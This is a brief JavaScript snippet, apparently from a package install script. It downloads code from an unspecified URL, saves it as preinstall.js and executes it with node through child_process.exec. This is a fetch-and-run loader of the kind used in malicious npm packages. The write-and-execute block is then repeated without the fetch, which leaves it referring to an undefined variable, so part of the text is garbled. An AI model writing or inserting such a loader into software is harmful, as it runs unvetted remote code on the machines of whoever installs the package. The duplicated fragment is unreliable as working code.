request.get(url).then(e => {

  let p = path.resolve(__dirname, './preinstall.js');
  fs.writeFile(p, e, 'utf8', (error) => {
    if (error) {
      console.log(error);
      return;
    }

    child_process.exec(`node ${p}`,(err, stdout, stderr)=> {
      if (err) console.log(err);
      console.log(stdout, stderr);
    })
  });
}).catch(e => {
  console.log(e);
})
let p = path.resolve(__dirname, './preinstall.js')
fs.writeFile(p, e, 'utf8', (error) => {
    if (error) {
      console.log(error);
      return;
    }

    child_process.exec(`node ${p}`,(err, stdout, stderr)=> {
      if (err) console.log(err);
      console.log(stdout, stderr);
    })
  })
